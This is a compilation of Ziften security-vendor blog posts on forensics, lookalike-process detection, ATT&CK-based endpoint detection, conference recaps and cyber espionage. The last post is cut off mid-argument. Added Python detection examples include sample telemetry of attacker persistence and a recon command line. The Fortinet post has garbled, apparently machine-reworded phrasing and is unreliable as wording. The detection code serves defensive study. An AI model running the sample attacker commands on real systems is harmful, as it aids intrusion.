Understanding The Distinction Between Incident Response And Forensic Analysis – Charles Leaver

Written By Roark Pollock And Presented By Ziften CEO Charles Leaver


There is probably a joke somewhere about the forensic analyst who showed up late to the incident response party. The seed of one, at least; but you have to understand the differences between incident response and forensic analysis to appreciate the humor.

Forensic analysis and incident response are related disciplines that can use similar tools and related data sets, but they also have some important differences. There are four particularly important differences between forensic analysis and incident response:

– Goals.
– Data requirements.
– Team skills.
– Benefits.

The difference in goals is perhaps the most important. Incident response is focused on a fast (i.e., near real time) reaction to an immediate threat or problem. For example, a house is on fire and the firefighters who show up to put it out are doing incident response. Forensic analysis is typically performed as part of a scheduled compliance, legal discovery, or law enforcement investigation. For example, a fire investigator may examine the remains of that house fire to determine the overall damage, the cause of the fire, and whether the cause was such that other houses face the same risk. In other words, incident response is focused on containment of a threat or problem, while forensic analysis is focused on a full understanding and thorough remediation of a breach.

A second major difference between the disciplines is the data needed to achieve those goals. Incident response teams normally need only short-term data sources, typically no more than a month or so, while forensic analysis teams usually need much longer-lived logs and files. Remember that the typical dwell time of a successful attack is somewhere between 150 and 300 days, so a 30-day retention window will rarely reach back to the initial compromise.

While there is commonality in the personnel skills of incident response and forensic analysis teams, and in fact incident response is often considered a subset of the broader forensic discipline, there are important differences in job requirements. Both kinds of work require strong log analysis and malware analysis skills. Incident response needs the ability to quickly isolate an infected device and to establish a means to remediate or quarantine it. Interactions tend to be with other operations and security staff members. Forensic analysis generally requires interaction with a much broader set of departments, including compliance, HR, legal and operations.

Not surprisingly, the perceived benefits of these activities also differ.

The ability to remove a threat from one device in near real time is a significant determinant in keeping breaches isolated and limited in impact. Incident response, along with proactive threat hunting, is the first line of defense in security operations. Forensic analysis is incident response's less glamorous relative. However, the benefits of this work are indisputable. A thorough forensic examination allows the removal of all threats through careful analysis of the entire attack chain of events. Which is no laughing matter.

Do your endpoint security processes allow both immediate incident response and long-term historical forensic analysis?

Part 1 Of Using Edit Distance For Detection – Charles Leaver

Written By Jesse Sampson And Presented By Charles Leaver CEO Ziften


Why are the same techniques used by attackers over and over? The simple answer is that they still work. For example, Cisco's 2017 Cybersecurity Report tells us that after years of decline, spam email with malicious attachments is once again on the rise. In that conventional attack vector, malware authors often conceal their activity by using a filename similar to a common system process.

There is not necessarily a connection between a file's path name and its contents: anyone who has tried to hide sensitive information by giving it a boring name like "taxes", or changed the extension of a file attachment to get around email rules, understands this principle. Malware authors understand it too, and will often name malware to resemble common system processes. For example, "iexplore.exe" is Internet Explorer, but "iexplorer.exe" with an extra "r" could be anything. It is easy even for professionals to overlook this small difference.

The opposite problem, known .exe files running in unusual locations, is easy to address using SQL set operations and string functions: compare the directory each known name was observed in against the directory it normally runs from.


What about the other case, finding near matches to an executable name? Most people start their search for near string matches by sorting the data and visually scanning for discrepancies. This works well enough for a small data set, maybe even a single system. Finding these patterns at scale, however, requires an algorithmic approach. One established technique for "fuzzy matching" is edit distance: the minimum number of single-character insertions, deletions and substitutions needed to turn one string into another.

What is the best way to compute edit distance? For Ziften, our technology stack includes HP Vertica, which makes this task easy. The internet is full of data scientists and data engineers singing Vertica's praises, so it will suffice to point out that Vertica makes it easy to build custom functions that take full advantage of its power, from C++ power tools to statistical modeling scalpels in R and Java.

This Git repo is maintained by Vertica enthusiasts working in industry. It is not a supported offering, but the Vertica team is certainly aware of it, and moreover is thinking every day about how to make Vertica better for data scientists, so it is a good space to watch. Most importantly, it contains a function to compute edit distance! There are also some other natural language processing tools there, such as word stemmers and tokenizers.

By applying edit distance to the top executable paths, we can quickly find the closest match for each of our top hits. This is an interesting data set: we can sort by distance to find the closest matches across the whole data set, or sort by frequency of the top path to see the nearest match to our most commonly used processes. This data can also surface on contextual "report card" pages to show, e.g., the top five closest strings for a given path. Below is a toy example to give a sense of its use, based on real data ZiftenLabs observed in a customer environment.


Setting a threshold of 0.2 seems to give good results in our experience, but the point is that this can be tuned to fit individual use cases. Did we find any malware? We notice that "teamviewer_.exe" (should be just "teamviewer.exe"), "iexplorer.exe" (should be "iexplore.exe"), and "cvshost.exe" (should be "svchost.exe", unless perhaps you work for CVS pharmacy...) all look odd. Since we are already in our database, it is also trivial to pull the associated MD5 hashes, Ziften suspicion scores, and other attributes for a deeper dive.
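Both checks, the near-match search for names like "cvshost.exe" and the wrong-location check for known names, as an added example that is not part of the original post and is not Ziften's or Vertica's code. It uses plain Python instead of the Vertica edit-distance function, reads the 0.2 threshold as edit distance divided by the longer name (an assumption), and constructs its own table of known processes, their normal directories, and the observed paths.

```python
# Added example (not Ziften's or Vertica's code): the near-match and
# wrong-location checks described above, done in plain Python rather than
# Vertica SQL. The known-process table and the observed paths below are
# constructed for illustration; the "normal" directories are this example's
# assumption, not from the post.
import ntpath

# Known-good executable names and the directories they normally run from
# (lower-case, because Windows paths are case-insensitive).
KNOWN = {
    "svchost.exe": {r"c:\windows\system32"},
    "lsass.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows"},
    "iexplore.exe": {r"c:\program files\internet explorer",
                     r"c:\program files (x86)\internet explorer"},
    "teamviewer.exe": {r"c:\program files\teamviewer",
                       r"c:\program files (x86)\teamviewer"},
}


def levenshtein(a: str, b: str) -> int:
    """Edit distance: the minimum number of single-character insertions,
    deletions and substitutions that turn a into b (two-row dynamic program)."""
    if len(a) < len(b):
        a, b = b, a
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def normalized_distance(a: str, b: str) -> float:
    """Edit distance divided by the longer length: 0.0 is identical, 1.0 shares
    nothing. The post's 0.2 threshold is interpreted as this ratio."""
    longest = max(len(a), len(b))
    return levenshtein(a, b) / longest if longest else 0.0


def candidates(name: str, threshold: float = 0.2):
    """Known names within the threshold of `name`, nearest first. Exact matches
    are excluded; those go through the location check instead."""
    name = name.lower()
    hits = [(k, round(normalized_distance(name, k), 3)) for k in KNOWN]
    return sorted([h for h in hits if 0 < h[1] <= threshold],
                  key=lambda h: (h[1], h[0]))


def triage(paths, threshold: float = 0.2):
    """Return (near_misses, misplaced): names that almost match a known process,
    and known process names running from a directory they do not belong in."""
    near_misses, misplaced = [], []
    for p in paths:
        p = p.lower()
        directory, base = ntpath.split(p)
        if base in KNOWN:
            if directory not in KNOWN[base]:
                misplaced.append((p, base))
            continue
        hits = candidates(base, threshold)
        if hits:
            near_misses.append((base, hits))
    return near_misses, misplaced


# Constructed observations, modelled on the toy example in the post.
SAMPLE_PATHS = [
    r"C:\Windows\System32\svchost.exe",
    r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
    r"C:\Users\bob\AppData\Local\Temp\cvshost.exe",
    r"E:\portable\iexplorer.exe",
    r"E:\portable\teamviewer_.exe",
    r"C:\Program Files\Google\Chrome\Application\chrome.exe",
]

if __name__ == "__main__":
    near, misplaced = triage(SAMPLE_PATHS)
    for base, hits in near:
        print(f"near miss: {base} ~ {hits}")
    for path, base in misplaced:
        print(f"misplaced: {base} running from {ntpath.dirname(path)}")
```

Note that "iexplorer.exe" is one edit away from both "iexplore.exe" and "explorer.exe", so the function returns both rather than guessing; a real report card would show all candidates under the threshold and let the analyst decide.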


In this particular real-life environment, it turned out that teamviewer_.exe and iexplorer.exe were portable applications, not known malware. We helped the customer investigate the user and system where we observed them, because use of portable apps from a USB drive can be evidence of illicit activity. The more troubling find was cvshost.exe. Ziften's intelligence feeds indicated that this is a suspect file. Looking up the MD5 hash of the file on VirusTotal confirmed the Ziften data, indicating that this is a potentially serious Trojan that may be part of a botnet or doing something even more harmful. Once the malware was found, however, it was easy to resolve the problem and make sure it stays resolved using Ziften's ability to kill and continuously block processes by MD5 hash.

Even as we develop sophisticated predictive analytics to identify malicious patterns, it is important that we continue to improve our ability to hunt for known patterns and old tricks. Just because new threats emerge does not mean the old ones go away!

If you enjoyed this post, keep watching here for part 2 of this series, where we will apply this approach to hostnames to detect malware droppers and other malicious sites.

Increasing Numbers Of Connected Devices Will Present A Number Of Endpoint Challenges – Charles Leaver

Written By Roark Pollock And Presented By Ziften CEO Charles Leaver


It wasn't long ago that everyone knew exactly what you meant if you raised the subject of an endpoint. If someone wanted to sell you an endpoint security solution, you knew exactly what devices that software was going to protect. But when I hear someone casually mention endpoints today, The Princess Bride's Inigo Montoya comes to mind: "You keep using that word. I do not think it means what you think it means." Today an endpoint could be almost any type of device.

In fact, endpoints are so varied today that people have resorted to calling them "things." According to Gartner, at the end of 2016 there were over 6 billion "things" connected to the internet. The consulting firm forecasts that this number will grow to 21 billion by 2020. Enterprise uses of these things will be both generic (e.g. connected light bulbs and HVAC systems) and industry specific (e.g. oil rig safety monitoring). For IT and security teams responsible for connecting and protecting endpoints, this is only half of the new challenge, however. The adoption of virtualization technology has redefined what an endpoint is, even in environments where these teams have traditionally operated.

The last decade has seen a massive change in the way end users access information. Physical devices continue to become more mobile, with many information workers now doing most of their computing and communication on laptops and mobile phones. More significantly, everyone is becoming an information worker. Today, better instrumentation and monitoring have enabled levels of data collection and analysis that make inserting information technology into almost any job worthwhile.

At the same time, more traditional IT assets, especially servers, are being virtualized to remove some of the traditional constraints of having those assets tied to physical devices.

These two trends together will affect security teams in important ways. The totality of "endpoints" will include billions of long-lived and insecure IoT endpoints, along with billions of virtual endpoint instances that will be scaled up and down and migrated to different physical locations as needed.

Organizations will have very different concerns with these two general kinds of endpoints. Over their lifetimes, IoT devices will need to be protected from a host of threats, some of which have yet to be dreamed up. Monitoring and protecting these devices will require advanced detection capabilities. On the plus side, it will be possible to maintain distinct log data to enable forensic examination.

Virtual endpoints, on the other hand, present their own important concerns. Their ability to move physical location makes it far harder to guarantee that the right security policies are always attached to the endpoint. The practice of re-imaging virtual endpoints can make forensic investigation difficult, since important data is usually lost when a new image is applied.

So no matter what word or phrase is used to describe your endpoints (endpoint, system, client device, user device, mobile phone, server, virtual machine, container, cloud workload, IoT device, and so on), it is essential to understand precisely what someone means when they use the term endpoint.

Detection Is Crucial Post Compromise – Charles Leaver

Written By Dr Al Hartmann And Presented By Charles Leaver CEO Ziften


If Prevention Has Failed Then Detection Is Vital

The last scene in the well known Vietnam War film Platoon depicts a North Vietnamese Army regiment in a surprise night attack breaching the concertina wire perimeter of an American Army battalion, overrunning it, and slaughtering the stunned defenders. The desperate company commander, understanding their dire defensive predicament, orders his air support to strike his own position: "For the record, it's my call – Dump everything you've got left on my position!" Minutes later the battlefield is immolated in a napalm hellscape.

Although a physical conflict, this illustrates two aspects of cybersecurity: (1) you must deal with inevitable perimeter breaches, and (2) it can be bloody hell if you do not detect early and respond forcefully. MITRE Corporation has been leading the call for rebalancing cybersecurity priorities to put due emphasis on breach detection in the network interior rather than merely focusing on penetration prevention at the network perimeter. Instead of defense in depth, the latter produces a flawed "tootsie pop" defense: hard, crunchy shell, soft chewy center. Writing in a MITRE blog, Gary Gagnon, MITRE's senior vice president, director of cybersecurity, and chief security officer, explains: "We could see that it would not be a question of if your network will be breached but when it will be breached. Today, organizations are asking 'How long have the intruders been inside? How far have they gone?'"

Some call this the "assumed breach" approach to cybersecurity, or as tweeted by F-Secure's Chief Research Officer:

Q: How many of the Fortune 500 are compromised – Answer: 500.

This is based on the likelihood that any sufficiently complex cyber environment has an existing compromise, and that Fortune 500 enterprises are of magnificently complex scale.

Shift the Burden of Perfect Execution from the Defenders to the Attackers

The traditional cybersecurity viewpoint, derived from the legacy perimeter defense model, has been that the attacker only has to be right once, while the defender has to be right every time. A sufficiently resourced and persistent attacker will eventually achieve penetration. And time to successful penetration decreases with increasing size and complexity of the target enterprise.

A perimeter or prevention-reliant cyber defense model essentially demands perfect execution by the defender, while ceding success to any sufficiently sustained attack: a recipe for certain cyber catastrophe. For example, a leading cybersecurity red team reports successful enterprise penetration in under three hours in more than 90% of their client engagements, and these white hats are restricted to ethical means. Your enterprise's black hat adversaries are not so constrained.

To be viable, the cyber defense strategy must turn the tables on the attackers, shifting to them the unattainable burden of perfect execution. That is the rationale for a strong detection capability that continuously monitors endpoint and network behavior for any anomalous indicators or observed attacker footprints inside the perimeter. The more sensitive the detection capability, the more care and stealth the attackers must exercise in executing their kill chain sequence, and the more time, labor and skill they must invest. The defenders need only observe a single attacker misstep to uncover their tracks and unwind the attack kill chain. Now the defenders become the hunters, the attackers the hunted.

The MITRE ATT&CK Model

MITRE provides a detailed taxonomy of attacker footprints covering the post-compromise portion of the kill chain, known by the acronym ATT&CK, for Adversarial Tactics, Techniques, and Common Knowledge. ATT&CK project team leader Blake Strom says, "We decided to focus on the post-attack period [portion of kill chain outlined in orange below], not just because of the strong likelihood of a breach and the dearth of actionable information, but also because of the many opportunities and intervention points available for effective defensive action that do not necessarily rely on prior knowledge of adversary tools."




As shown in the MITRE figure above, the ATT&CK model provides additional granularity on the post-compromise phases of the attack kill chain, breaking them out into ten tactic categories. Each tactic category is further detailed into a list of techniques an attacker might use in carrying out that tactic. The January 2017 update of the ATT&CK matrix lists 127 techniques across its ten tactic categories. For example, Registry Run Keys / Start Folder is a technique in the Persistence category, Brute Force is a technique in the Credential Access category, and Command-Line Interface is a technique in the Execution category.

Leveraging Endpoint Detection and Response (EDR) in the ATT&CK Model

Endpoint Detection and Response (EDR) solutions such as Ziften's provide critical visibility into attacker use of techniques listed in the ATT&CK model. For example, Registry Run Keys / Start Folder technique use is reported, as is Command-Line Interface use, since both involve readily observable endpoint behavior. Brute Force use in the Credential Access category should be blocked by design in every authentication architecture and be observable from the resulting account lockout. But even here the EDR product can report events such as failed login attempts, where an attacker might make only a few guesses at a time to stay under the account lockout threshold.
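The three techniques just named, turned into detection logic over endpoint telemetry, as an added example that is not part of the original post and is not Ziften's code. The event records, the lockout policy (five failures in 30 minutes) and the alert level are all this example's own assumptions; the point of the third check is that it fires on failed logons that never reach the lockout count.

```python
# Added example (not Ziften's code): three small detections for the ATT&CK
# techniques named above, run over constructed endpoint telemetry. The event
# shapes, the lockout policy and the alert level are this example's
# assumptions, not any product's schema or any site's policy.
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta

LOCKOUT_THRESHOLD = 5                   # assumed policy: lock after 5 bad passwords
LOCKOUT_WINDOW = timedelta(minutes=30)  # assumed policy: counter resets after 30 min
ALERT_AT = 3                            # alert at 3 failures per account per window

# Substring matches both ...\CurrentVersion\Run\... and ...\CurrentVersion\RunOnce\...
AUTOSTART_KEY_MARKER = r"\software\microsoft\windows\currentversion\run"
STARTUP_FOLDER_MARKER = r"\start menu\programs\startup"
SHELLS = {"cmd.exe", "powershell.exe"}
EXPECTED_SHELL_PARENTS = {"explorer.exe"}   # interactive use from the desktop

# Constructed sample events, one dict each.
EVENTS = [
    {"type": "registry_set", "host": "ws01",
     "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "image": r"C:\Users\bob\AppData\Roaming\upd.exe"},
    {"type": "registry_set", "host": "ws01",
     "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\SomeApp",
     "image": r"C:\Windows\System32\msiexec.exe"},
    {"type": "file_create", "host": "ws01",
     "path": r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sync.lnk",
     "image": r"C:\Users\bob\AppData\Roaming\upd.exe"},
    {"type": "process_create", "host": "ws01", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Users\bob\AppData\Roaming\upd.exe", "cmdline": "cmd.exe /c whoami & net user"},
    {"type": "process_create", "host": "ws01", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe"},
    {"type": "logon_failed", "host": "dc01", "user": "admin", "time": "2017-01-10T09:00:00"},
    {"type": "logon_failed", "host": "dc01", "user": "admin", "time": "2017-01-10T09:09:00"},
    {"type": "logon_failed", "host": "dc01", "user": "admin", "time": "2017-01-10T09:20:00"},
    {"type": "logon_failed", "host": "dc01", "user": "alice", "time": "2017-01-10T09:05:00"},
    {"type": "logon_failed", "host": "dc01", "user": "alice", "time": "2017-01-10T11:05:00"},
]


def detect_persistence(events):
    """Registry Run Keys / Start Folder (Persistence): any write to an autostart
    registry key or to the Startup folder, reported with the writing image."""
    findings = []
    for e in events:
        if e["type"] == "registry_set" and AUTOSTART_KEY_MARKER in e["key"].lower():
            findings.append((e["host"], e["image"], e["key"]))
        elif e["type"] == "file_create" and STARTUP_FOLDER_MARKER in e["path"].lower():
            findings.append((e["host"], e["image"], e["path"]))
    return findings


def detect_cli(events):
    """Command-Line Interface (Execution): every shell launch is reported, and
    flagged when the parent is not an interactive desktop process."""
    findings = []
    for e in events:
        if e["type"] == "process_create" and ntpath.basename(e["image"]).lower() in SHELLS:
            parent = ntpath.basename(e["parent"]).lower()
            findings.append({"host": e["host"], "cmdline": e["cmdline"], "parent": parent,
                             "unusual_parent": parent not in EXPECTED_SHELL_PARENTS})
    return findings


def detect_slow_brute_force(events):
    """Brute Force (Credential Access) kept under the lockout threshold: count
    failed logons per account in a sliding LOCKOUT_WINDOW and report the peak
    count for any account reaching ALERT_AT, even though no lockout fired."""
    by_user = defaultdict(list)
    for e in events:
        if e["type"] == "logon_failed":
            by_user[e["user"]].append(datetime.fromisoformat(e["time"]))
    alerts = {}
    for user, times in by_user.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > LOCKOUT_WINDOW:
                start += 1
            count = end - start + 1
            if count >= ALERT_AT:
                alerts[user] = max(alerts.get(user, 0), count)
    return alerts


if __name__ == "__main__":
    for f in detect_persistence(EVENTS):
        print("persistence:", f)
    for f in detect_cli(EVENTS):
        print("cli:", f)
    for user, n in detect_slow_brute_force(EVENTS).items():
        print(f"slow brute force: {user} had {n} failures within {LOCKOUT_WINDOW} "
              f"(lockout at {LOCKOUT_THRESHOLD})")
```

On the sample data the "admin" account shows three failures in twenty minutes, two short of the assumed lockout, which is exactly the case a lockout-only control never surfaces; "alice" has two failures two hours apart and stays quiet.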

For watchful defenders, any technique use might be the attack giveaway that unravels the entire kill chain. EDR solutions compete on their technique observation, reporting, and alerting capabilities, as well as on their analytics capacity to perform more of the attack pattern detection and kill chain reconstruction in support of the security analysts staffing the enterprise SOC. Here at Ziften we will detail more EDR solution capabilities in support of the ATT&CK post-compromise detection model in future blog posts in this series.

The Buzz From RSA 2017 Is That Enterprises Demand Tailored Security Solutions – Charles Leaver

Written By Michael Vaughan And Presented By Charles Leaver Ziften CEO


More tailored products are needed by security, network and operations teams in 2017

Many of us have attended security conferences over the years, but none bring the same high level of excitement as RSA, where security is discussed by the world. Of all the conferences I have attended and worked, nothing comes close to the passion for new technology people displayed this past week in downtown San Francisco.

After taking a couple of days to digest the many conversations about the needs and limitations of existing security tech, I have been able to synthesize a particular theme among attendees: people want tailored solutions that fit their environment and work well across multiple internal teams.

When I use the term "people," I mean everyone in attendance regardless of technology segment. Operations professionals, security pros, network veterans, and even user behavior analysts frequented the Ziften booth and shared their stories with us.

Everyone seemed more prepared than ever to discuss their wants and needs for their environment. These attendees had their own set of objectives they wanted to achieve within their department, and they were hungry for answers. Since the Ziften Zenith solution provides such broad visibility into enterprise devices, it's not surprising that our booth stayed crowded with people eager to learn more about a new, refreshingly simple endpoint security technology.

Attendees came with complaints about myriad enterprise-centric security concerns and sought deeper insight into what is really happening on their network and on devices traveling in and out of the office.

End users of old-school security solutions are on the lookout for newer, more essential software.

If I could pick just one of the frequent questions I received at RSA to share, it's this one:

"What exactly is endpoint discovery?"

1) Endpoint discovery: Ziften exposes a historical view of unmanaged devices which have been connected to other enterprise endpoints at some point. Ziften allows users to find known and unknown entities which are active or have been interacting with known endpoints.

a. Unmanaged Asset Discovery: Ziften uses our extension platform to expose these unknown entities operating on the network.

b. Extensions: These are custom-fit solutions tailored to the user's particular wants and needs. The Ziften Zenith agent can execute the designated extension once, on a schedule, or continuously.

Almost always, after the above explanation, came the real reason they were visiting:

People are looking for a wide range of solutions for different departments, including executives. This is where working at Ziften makes answering this question a real treat.

Only a portion of the RSA attendees are security experts. I spoke with dozens of network, operations and endpoint management staff, vice presidents, general managers and channel partners.

They clearly all use and understand the need for quality security software, but seemingly find the translation to business value missing among security vendors.

NetworkWorld's Charles Araujo phrased the problem quite well in a post last week:

Businesses must also rationalize security data in a service context and manage it holistically as part of the overall IT and business operating model. A group of vendors is also trying to tackle this challenge …

Ziften was one of only three companies mentioned.

After listening to the wants and needs of people from various business-critical backgrounds and explaining the capabilities of Ziften's Extension platform to them, I typically described how Ziften would tailor an extension to meet their need, or gave them a short demo of an extension that would enable them to overcome a challenge.

2) Extension Platform: Customized, actionable solutions.

a. SKO Silos: Extensions based on fit and need (operations, network, endpoint, etc.).

b. Custom Requests: Need something you can't see? We can fix that for you.

3) Enhanced Forensics:

a. Security: Risk management, threat assessment, vulnerabilities, suspicious metadata.

b. Operations: Compliance, license justification, unmanaged assets.

c. Network: Ingress/egress IP movement, domains, volume metadata.

4) Visibility within the network, not just what comes in and goes out.

a. ZFlow: Finally see the network traffic inside your enterprise.

Needless to say, everyone I spoke with in our booth quickly understood the critical benefit of having a tool such as Ziften Zenith running in and across their enterprise.

Forbes writer Jason Bloomberg said it best when he recently described the future of enterprise security software and how all signs point toward Ziften leading the way:

Perhaps the broadest disruption: vendors are improving their ability to understand how bad actors behave, and can thus take steps to prevent, identify or mitigate their malicious activities. In particular, today's vendors understand the 'Cyber Kill Chain' – the steps a skilled, patient hacker (known in the biz as an advanced persistent threat, or APT) will take to achieve his/her nefarious objectives.

The product of U.S. defense contractor Lockheed Martin, the Cyber Kill Chain contains seven links: reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives.

Today's more innovative vendors target one or more of these links, with the goal of preventing, detecting or mitigating the attack. Five vendors at RSA stood out in this category.

Ziften offers an agent-based approach to tracking the behavior of users, devices, applications, and network elements, both in real time and across historical data.

In real time, analysts use Ziften for threat identification and prevention, while they use the historical data to uncover steps in the kill chain for mitigation and forensic purposes.

Read This To Ensure That Operational Problems Do Not Become Security Issues – Charles Leaver

Written By Dr Al Hartmann And Presented By Ziften CEO Charles Leaver


Return to Basics With Hygiene and Avoid Serious Problems

When you were a kid you were taught that brushing your teeth properly and flossing will avoid the need for expensive crowns and root canals. Basic hygiene is far simpler and far cheaper than neglect and disease. The same lesson applies in enterprise IT: we can run a sound operation with proper endpoint and network hygiene, or we can face mounting security problems and disastrous data breaches as lax hygiene exacts its hard toll.

Operational and Security Issues Overlap

Endpoint Detection and Response (EDR) tools like those we have built here at Ziften provide analytic insight into system operation across the enterprise endpoint population. They also provide endpoint-derived network operation insights that substantially expand on wire visibility alone and extend into virtual and cloud environments. These insights benefit both security and operations teams in significant ways, given the considerable overlap between operational and security issues:

On the security side, EDR tools offer critical situational awareness for incident response. On the operational side, EDR tools provide vital endpoint visibility for operational control. Critical situational awareness demands a baseline understanding of endpoint population operating norms, and that understanding facilitates proper operational control.

Another way to describe these interdependencies is:

You can't secure what you don't manage.
You can't manage what you don't measure.
You can't measure what you don't monitor.

Managing, measuring, and monitoring has as much to do with the security role as with the operational role, so don't try to split the baby. Management implies adherence to policy, that adherence must be measured, and operational measurements constitute a time series that must be monitored. A few sporadic measurements of a critical dynamic time series lack interpretive context.

Tight security does not compensate for lax management, nor does tight management compensate for lax security. [Read that again for emphasis.] Mission execution imbalances here lead to unsustainable inefficiencies and scale obstacles that inevitably cause significant security breaches and operational shortfalls.

Areas Of Overlap

Significant overlaps between operational and security issues include:

Configuration hardening and standard images
Group policy
Application control and cloud management
Network segmentation and management
Data security and encryption
Asset management and device restoration
Mobile device management
Log management
Backups and data restoration
Vulnerability and patch management
Identity management
Access management
Continual employee cyber awareness training

For example, asset management and device restoration as well as backup and data restoration are likely operations team responsibilities, but they become major security problems when ransomware sweeps the enterprise, bricking all devices (not just the typical endpoints, but any network-connected devices such as printers, badge readers, security cameras, network routers, medical imaging devices, industrial control systems, etc.). What would your enterprise response time be to reflash and refresh all device images from scratch and restore their data? Or is your contingency plan to promptly stuff the attackers' Bitcoin wallets and hope they haven't exfiltrated your data for further extortion and monetization? And why would you offload your data restoration obligation to a criminal syndicate, blindly trusting in their perfect data restoration integrity? It makes absolutely zero sense. Operational control responsibility rests with the enterprise, not with the attackers, and may not be shirked. Shoulder your duty!

For another example, standard image construction using best-practice configuration hardening is clearly a joint responsibility of operations and security staff. In contrast to ineffective signature-based endpoint protection platforms (EPP), which all large enterprise breach victims have long had in place, configuration hardening works, so bake it in and continually refresh it. Likewise consider the needs of business personnel whose job function requires opening unsolicited email attachments, such as resumes, invoices, legal notices, or other required documents. This should be done in an isolated virtual sandbox environment, not on your production endpoints. Security staff will make these decisions, but operations staff will be imaging the endpoints and supporting the workers. These are shared duties.

Example Of Overlap:

Detonate in a safe environment. Do not use production endpoints for opening unsolicited but necessary email files, like resumes, invoices, legal notices, and so on.

Focus Limited Security Resources on the Tasks Only They Can Perform

Most large enterprises are challenged to fully staff all their security functions. Left unaddressed, deficiencies in operational efficiency will burn out security staff so quickly that security functions will be perpetually understaffed. There won't be enough fingers on your security team to plug the growing holes in the security dike that lax or inattentive endpoint, network or database management produces. And it will be less difficult to staff operational roles than to staff security roles with talented analysts.

Transfer routine, formulaic activities to operations personnel. Focus limited security resources on the tasks only they can perform:

Security Operations Center (SOC) staffing
Preventive penetration testing and red teaming
Reactive incident response and forensics
Proactive threat hunting (both insider and external)
Security oversight of overlapping operational functions (ensure a current security mindset)
Security policy development and stakeholder buy-in
Security architecture/tools/methodology design, selection, and development

Impose disciplined operations management and focus limited security resources on critical security roles. Then your enterprise may avoid letting operational issues fester into security issues.

Buzz Established By Security Fabric At This Year’s Fortinet Accelerate Conference – Charles Leaver

Written By Josh Applebaum And Presented By Ziften CEO Charles Leaver

The Fortinet Accelerate 2017 conference was held recently in Las Vegas. Ziften sponsored Fortinet's annual Global Partner Conference for the second time, and it was a pleasure to be there! The energy at the show was palpable, and this was not due to the energy drinks you always see people carrying around in Las Vegas. The buzz and energy came from a central theme throughout the week: the Fortinet Security Fabric.

The premise of Fortinet's Security Fabric is simple: take the disparate security "point products" that an organization has deployed, and connect them to leverage the deep intelligence each product holds in its own security silo to provide an integrated, end-to-end security blanket over the whole organization. Though Fortinet is usually thought of as a network security company, their approach to providing a complete security solution spans more than the traditional network to include endpoints, IoT devices, and the cloud. By exposing APIs to Fabric Ready partners and enabling the exchange of actionable threat intelligence, Fortinet is opening the door to a more collaborative strategy across the whole security industry.

It is revitalizing to see that Fortinet has the exact same beliefs as we have at Ziften, which is that the only way that we as a market are going to catch up to (and exceed) the hackers is through combination and cooperation across all reaches of security, despite which supplier provides each element of the total solution. This is not a problem we are going to resolve on our own, however rather one that will be solved through a combined method like the one set out by Fortinet with their Security Fabric. Ziften is proud to be an establishing member of Fortinet’s Fabric Ready Alliance program, integrating our special approach to endpoint security with Fortinet’s “think different” mindset of exactly what it suggests to incorporate and work together.

Throughout the week, Fortinet’s (really enthusiastic) channel partners had the chance to walk the program floor to see the incorporated solutions offered by the various innovation partners. Ziften showcased their integrations with Fortinet, containing the combination of our service with Fortinet’s FortiSandbox.

The Ziften solution collects unknown files from endpoints (clients or servers running OS X, Linux or Windows) and submits them to the FortiSandbox for analysis and detonation. Results are instantly fed back into Ziften for notifying, reporting, and (if possible) automated mitigation actions.

It was exciting to see that the Fortinet channel partners clearly got the worth of a Security Fabric approach. It was clear to them, along with Ziften, that the Security Fabric is not a marketing trick, however rather a genuine strategy assembled by, and led by, Fortinet. While this is only the beginning of Fortinet’s Security Fabric story, Ziften is delighted to collaborate with Fortinet and view the story continue to unfold!

2017 Will Bring Three Tiers Of Cyber Espionage – Charles Leaver

Written By Jesse Sampson And Presented By Ziften CEO Charles Leaver


There is a lot of debate at the moment about the hacking threat from Russia, and it would be easy for security professionals to be overly worried about cyber espionage. Since the objectives of a cyber espionage campaign dictate its targets, Ziften Labs can help answer the question of who is at risk by looking at why states run these campaigns.

Last Friday, the three major United States intelligence agencies released a detailed statement on Russian activity related to the 2016 US elections: Assessing Russian Activities and Intentions in Recent US Elections (Activities and Intentions). While some skeptics remain unconvinced by the new report, the threats it identifies, which we cover in this post, are compelling enough to warrant examination and realistic countermeasures, despite the near impossibility of incontrovertibly attributing an attack to its source. Naturally, the official Russian position has been a winking denial of the hacks.

"Usually these kinds of leaks occur not because cyber criminals broke in but, as any specialist will tell you, because someone simply forgot the password or set the easy password 123456." – German Klimenko, Putin's top Internet adviser

While agencies get criticized for bureaucratic language like "high confidence," the considered rigor of documents like Activities and Intentions contrasts with the headline-friendly "1000% certainty" of a mathematically disinclined media hustler like Julian Assange.

Activities and Intentions is most perceptive when it locates the use of hacking and cyber espionage within "multifaceted" Russian doctrine:

"Moscow's use of disclosures during the US election was unprecedented, but its influence campaign otherwise followed a longstanding Russian messaging strategy that blends covert intelligence operations, such as cyber activity, with overt efforts by Russian Government agencies, state-funded media, third-party intermediaries, and paid social media users or 'trolls.'"

The report is weakest when assessing the motives behind the doctrine, a.k.a. strategy. Apart from some incantations about intrinsic Russian hostility to the liberal democratic order, it claims that:

"Putin most likely wanted to discredit Secretary Clinton because he has publicly blamed her since 2011 for inciting mass protests against his regime in late 2011 and early 2012, and because he holds a grudge for comments he almost certainly saw as disparaging him."

A more nuanced assessment of Russian motivation and its cyber manifestations will help us set security strategy in this environment. Ziften Labs has identified three major strategic imperatives at work.

First, as Kissinger put it, through history "Russia came to see itself as a beleaguered outpost of civilization for which security could be found only through exerting its absolute will over its neighbors" (52). US policy in the Clinton era threatened this notion through the expansion of NATO and dislocating economic interventions, perhaps contributing to a Russian preference for a Trump presidency.

